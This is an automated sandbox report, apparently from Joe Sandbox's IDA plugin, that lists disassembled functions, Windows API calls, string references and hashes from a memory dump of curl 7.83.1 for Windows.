                                • String ID: (non-permanent)$%255[^:]:%d$*$+$Added %s:%d:%s to DNS cache%s$Couldn't parse CURLOPT_RESOLVE entry '%s'$Couldn't parse CURLOPT_RESOLVE removal entry '%s'$RESOLVE %s:%d is - old addresses discarded$RESOLVE %s:%d is wildcard, enabling wildcard checks$Resolve address '%s' found illegal
                                • API String ID: 601868998-1491845622
                                • Opcode ID: 1df06219a403424cf2844854f839e029daa83c078fc74469ffb4bac7b3177eea
                                • Instruction ID: b6b1625864b7da567c8b87e395ab8ab0befdba4c3c3208fe47eb8b7a2f22210d
                                • Opcode Fuzzy Hash: 1df06219a403424cf2844854f839e029daa83c078fc74469ffb4bac7b3177eea
                                • Instruction Fuzzy Hash: 41B104319046199EDB31AA18CC89BEEB7B5FF81304F1440E9E149E6282EB71AE85CF51
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00875A87), ref: 00889806
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00875A87), ref: 0088983D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00875A87), ref: 0088985F
                                • ___from_strstr_to_strchr.LIBCMT ref: 0088986B
                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(008C5674,00000000,00000002,?,00875A87), ref: 00889884
                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(../,00000000,00000003), ref: 00889899
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008899D1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$strncmp$___from_strstr_to_strchrmalloc
                                • String ID: ../$/..$/../$/./
                                • API String ID: 11556461-456519384
                                • Opcode ID: 8130b4fdb3735c9961ab8618a23d16bf8b889d034e8f3d4e27509cb01f9be780
                                • Instruction ID: e9d75dccf76fec86d8351fa6ff1b29a6782ef2e1c833581e0e5d922da741ed78
                                • Opcode Fuzzy Hash: 8130b4fdb3735c9961ab8618a23d16bf8b889d034e8f3d4e27509cb01f9be780
                                • Instruction Fuzzy Hash: C5513821A086479BDB322B286C14B79BFE5FFA7754F2C006EE8C2D7343E6619C418751
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089D359
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089D36E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089D3C0
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089D405
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089D58F
                                Strings
                                • partial download completed, closing connection, xrefs: 0089D5BA
                                • control connection looks dead, xrefs: 0089D553
                                • Failure sending ABOR command: %s, xrefs: 0089D469
                                • Exceeded storage allocation, xrefs: 0089D60E
                                • Received only partial file: %I64d bytes, xrefs: 0089D71F
                                • Remembering we are in dir "%s", xrefs: 0089D3D0
                                • Uploaded unaligned file size (%I64d out of %I64d bytes), xrefs: 0089D696
                                • server did not report OK, got %d, xrefs: 0089D5FB
                                • ABOR, xrefs: 0089D445
                                • No data was received, xrefs: 0089D709
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: ABOR$Exceeded storage allocation$Failure sending ABOR command: %s$No data was received$Received only partial file: %I64d bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%I64d out of %I64d bytes)$control connection looks dead$partial download completed, closing connection$server did not report OK, got %d
                                • API String ID: 1294909896-265991785
                                • Opcode ID: b2fc51dbf4c472605ccb8260814e1ce7bd8671c29090c0b3630deed20845dc7c
                                • Instruction ID: a3d483778fd67eb5fdc1e78e75e7779589b1df25f9b2606097f190200332e336
                                • Opcode Fuzzy Hash: b2fc51dbf4c472605ccb8260814e1ce7bd8671c29090c0b3630deed20845dc7c
                                • Instruction Fuzzy Hash: 08F114316087419FEF25EF38C58876ABBA1FB51314F1C861DE899C6282D774E844CB9A
                                APIs
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0087A0C3
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A0CB
                                • __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A0DD
                                • __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 0087A0EC
                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 0087A0F6
                                • _strrchr.LIBCMT ref: 0087A142
                                • _strrchr.LIBCMT ref: 0087A15C
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A173
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A180
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0087A188
                                • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0087A193
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ErrorLast_errno$_strrchr$__sys_errlist__sys_nerrstrncpy
                                • String ID: 0Lu@Ru@/Mu$Unknown error %d (%#x)
                                • API String ID: 3225659327-1265552004
                                • Opcode ID: 2b49dc245a5a6e1d8957539e7f7e2dcf28bce678d0a9e1a4afcbff783348f2fd
                                • Instruction ID: 1b9224ad268bf638372a4315b56321419a810867801b31f8aa030c122972ca8a
                                • Opcode Fuzzy Hash: 2b49dc245a5a6e1d8957539e7f7e2dcf28bce678d0a9e1a4afcbff783348f2fd
                                • Instruction Fuzzy Hash: A321F431300A029BE719277C9C09B2E7BD9FFDA351F544029F00ADA3A5EAA1C8008677
                                APIs
                                  • Part of subcall function 00870DCE: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00870E08
                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,0000001F), ref: 0089EF55
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089F0E0
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089F0F5
                                  • Part of subcall function 00870E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00863167), ref: 00870E2C
                                  • Part of subcall function 00870E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00870E41
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$strncpy
                                • String ID: %127[^= ]%*[ =]%255s$%hu%*[xX]%hu$1$BINARY$NEW_ENV$Syntax error in telnet option: %s$TTYPE$USER,%s$Unknown telnet option %s$XDISPLOC
                                • API String ID: 526250031-1116758244
                                • Opcode ID: 99b16b91bdced144fe4381c6b1fb37f01406ba1d91ad9bb3d5249b4c5fb32fa1
                                • Instruction ID: be95ddcf562a311548a5c806787e7eaa7044e9e239d20c84bccf89e44546ba85
                                • Opcode Fuzzy Hash: 99b16b91bdced144fe4381c6b1fb37f01406ba1d91ad9bb3d5249b4c5fb32fa1
                                • Instruction Fuzzy Hash: 1A714A71904608ABDF10EF14CC85BE677B8FB44344F1881B5E949DB246DF719A88CFA1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID:
                                • String ID: ACCT rejected by server: %03d$AUTH %s$CCC$Entry path is '%s'$Failed to clear the command channel (CCC)$Got a %03d ftp-server response when 220 was expected$PROT %c$SYST$unsupported parameter to CURLOPT_FTPSSLAUTH: %d
                                • API String ID: 0-499900516
                                • Opcode ID: 96b9674fb18e56c742bc5eba21bf1617e554083e66352cff33a5f5ee74fce352
                                • Instruction ID: b3030983c25b203c6bd0464c93e331714065ca99179277d73852c4cc98d82f1c
                                • Opcode Fuzzy Hash: 96b9674fb18e56c742bc5eba21bf1617e554083e66352cff33a5f5ee74fce352
                                • Instruction Fuzzy Hash: 8EC1F4B1A40629AFDF14EB28C881BBE77E5FB45314F1C407AE909EB342DB359D008B95
                                APIs
                                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?), ref: 008615E1
                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 008615F9
                                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?), ref: 00861692
                                • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?,?,?), ref: 008616A0
                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?), ref: 008616AC
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00861780
                                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,00000001,?,?,%.*s:,00000000,?), ref: 008618A3
                                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000001,?), ref: 008618B7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: fwrite$fflush$fputcfree
                                • String ID: %.*s:$Content-disposition:$etag:$filename=
                                • API String ID: 697768202-2097661518
                                • Opcode ID: 049261a66fef82d4e11eca3bf85460f6975306cf3481030f1d793a45c2f7e3c2
                                • Instruction ID: b760e167481a6377905e4ba7117233c0a38e00a80049440758c583b9a2cd11c7
                                • Opcode Fuzzy Hash: 049261a66fef82d4e11eca3bf85460f6975306cf3481030f1d793a45c2f7e3c2
                                • Instruction Fuzzy Hash: 89A1E335A00645AFDF21CF64C888BAABBE2FF51304F1E8569E856DB356D730AD40CB51
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008841E7
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008841FD
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088422D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00884265
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00884291
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008842D5
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00884311
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008843B3
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00884420
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00884432
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: NO_PROXY$Uses proxy env variable %s == '%s'$memory shortage$no_proxy
                                • API String ID: 1294909896-1311824155
                                • Opcode ID: 9b67799eb14f190ef151ad21a9cd4be012bca32ceafc1a8d2a1e46ab1df1afef
                                • Instruction ID: a24977f69c5ee50869372df46d2d8495725db6f9e8d6bf414a1bc15f0fef05c6
                                • Opcode Fuzzy Hash: 9b67799eb14f190ef151ad21a9cd4be012bca32ceafc1a8d2a1e46ab1df1afef
                                • Instruction Fuzzy Hash: 41A19E32A08716EBDB18AF749848BAEBBF5FF14314F24916AD419D3352DB74AD04CB90
                                APIs
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00869DCF
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00869E7A
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00869F01
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00869F0F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00869F5B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00869F70
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00869F9B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00869FAA
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00869FC5
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00869FD9
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$_strdup
                                • String ID: out of memory$k%
                                • API String ID: 2653869212-351869995
                                • Opcode ID: d31964c04c17d19388a490e61a127ef1cfecb7adb8241763c427c6c3695ca0a2
                                • Instruction ID: 85168d4405471868ce44f223f472452cb68a26a5933a1cd2f822c8a453d824d3
                                • Opcode Fuzzy Hash: d31964c04c17d19388a490e61a127ef1cfecb7adb8241763c427c6c3695ca0a2
                                • Instruction Fuzzy Hash: 1B817D31A01246CFDB14CFA4D888BADBBB5FF44315F2A417AE849DF296DB71A841CB50
                                APIs
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00862AC3
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862ADE
                                • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,008B7348), ref: 00862AFC
                                • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,008B7348), ref: 00862B19
                                • _mkdir.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000), ref: 00862B9F
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00862BAA
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00862BB5
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00862BD0
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00862BDB
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _errnofreestrtok$_mkdir_strdupmalloc
                                • String ID: %s%s$0Lu@Ru@/Mu
                                • API String ID: 2356461126-1827624816
                                • Opcode ID: b6196902cc043c6e77643ca955eb3f66f54c22136684b0e527925941deeea6ea
                                • Instruction ID: 3ec4ea085d0d7d5e64e36942da06c7b28d35deafe0163fc3cc71a9a127506eee
                                • Opcode Fuzzy Hash: b6196902cc043c6e77643ca955eb3f66f54c22136684b0e527925941deeea6ea
                                • Instruction Fuzzy Hash: D6415B35A08F16EFDB255E686C45AEE37E4FF4A770B2542DAE841E7381DB608C0186B1
                                APIs
                                • GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,RtlVerifyVersionInfo), ref: 00870B6D
                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00870B74
                                • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,00000000,00000002,?), ref: 00870C07
                                • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000001,?), ref: 00870C15
                                • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000020,?,?,00000001,?), ref: 00870C23
                                • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00870C31
                                • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00870C3D
                                • RtlVerifyVersionInfo.NTDLL(?,?,00000008,00000001), ref: 00870C5E
                                • VerifyVersionInfoW.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-1(?,0000003B,00000000,?,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00870C68
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ConditionMask$InfoVerifyVersion$AddressHandleModuleProc
                                • String ID: D?w$RtlVerifyVersionInfo$ntdll
                                • API String ID: 574519269-3637026075
                                • Opcode ID: 1340d7c7b6692241983b2e8109175835afcba40e4a78120e01ae07a3f09a1ea6
                                • Instruction ID: 715a3365be7edd9d8dd2699857e6f8242f7006e732861e79a466da39e1f49112
                                • Opcode Fuzzy Hash: 1340d7c7b6692241983b2e8109175835afcba40e4a78120e01ae07a3f09a1ea6
                                • Instruction Fuzzy Hash: CA31E4B1448385EFE7119F789C09B7B7BA8FB85718F044A1DF284D6291C7B4CA08CB62
                                APIs
                                  • Part of subcall function 008720F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,00868A7A,curl 7.83.1 (Windows) %s,00000000), ref: 00872101
                                • puts.API-MS-WIN-CRT-STDIO-L1-1-0(008B74AB), ref: 00868AC7
                                • qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,00000000,00000004,Function_00008A20), ref: 00868B1A
                                • puts.API-MS-WIN-CRT-STDIO-L1-1-0(008B74AB), ref: 00868B43
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: puts$__acrt_iob_funcqsort
                                • String ID: %s$%s $2022-05-13$7.83.1$Features:$Protocols: $Release-Date: %s$WARNING: curl and libcurl versions do not match. Functionality may be affected.$curl 7.83.1 (Windows) %s
                                • API String ID: 619265888-3826092985
                                • Opcode ID: a4dfc0bcd9179b490eba042103b2bc373d0c2c6af40db51b6173935497150ae5
                                • Instruction ID: 5ae2b817944e3a40e88c98929ab1a109dc506dd58d4a84c71b1d4b42a4c6e47d
                                • Opcode Fuzzy Hash: a4dfc0bcd9179b490eba042103b2bc373d0c2c6af40db51b6173935497150ae5
                                • Instruction Fuzzy Hash: D8312670340314DBC708EF6CE886CAA3BA5FB497107150229F528D7382CFB6D901C6A7
                                APIs
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 008635E5
                                • CreateFileA.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000080,00000007,00000000,00000003,00000000,00000000), ref: 008635FD
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086360D
                                • GetFileTime.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,?), ref: 00863621
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00863666
                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00863688
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00863690
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0086369B
                                Strings
                                • Failed to get filetime: underflow, xrefs: 00863646
                                • Failed to get filetime: GetFileTime failed: GetLastError %u, xrefs: 00863679
                                • Failed to get filetime: CreateFile failed: GetLastError %u, xrefs: 008636A2
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ErrorFileLast$CloseCreateHandleTimeUnothrow_t@std@@@__ehfuncinfo$??2@_strdupfree
                                • String ID: Failed to get filetime: CreateFile failed: GetLastError %u$Failed to get filetime: GetFileTime failed: GetLastError %u$Failed to get filetime: underflow
                                • API String ID: 862977939-2112902429
                                • Opcode ID: 5be3cd2caf9aa95ba43c57bd86b939f424984b7de60bd01bd0fdbe97e51b4543
                                • Instruction ID: 10d2e09c23f8cd633a44a3291fa457e2eef09291283f1df90c475984f68cad47
                                • Opcode Fuzzy Hash: 5be3cd2caf9aa95ba43c57bd86b939f424984b7de60bd01bd0fdbe97e51b4543
                                • Instruction Fuzzy Hash: CF21F271A04605BBD7156BB8DC4AF7E77ACFB51710F264228F502E63C0EA749F005A25
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088473C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00884755
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00884772
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088479C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00884874
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008848C3
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008848D7
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008848F3
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088495C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: %s%s.netrc$%s%s_netrc$Couldn't find host %s in the %s file; using defaults$HOME
                                • API String ID: 1294909896-3314400472
                                • Opcode ID: b5c1df35b377a8c39fdbd0dbac5d3cbd1e360eb39284cadba39584ebf1b61dfe
                                • Instruction ID: 237c0794c1b8e50216fef34b2dd8f373c3f12b95579de1f8e913e9cf63f5d8f6
                                • Opcode Fuzzy Hash: b5c1df35b377a8c39fdbd0dbac5d3cbd1e360eb39284cadba39584ebf1b61dfe
                                • Instruction Fuzzy Hash: 24A18136A0461BEFDB14AB64DC41AAEBBF5FF08310F14816AD905E7361EB70AD01CB91
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088346D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008834FF
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008835A5
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008835E8
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00883637
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 0088381E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
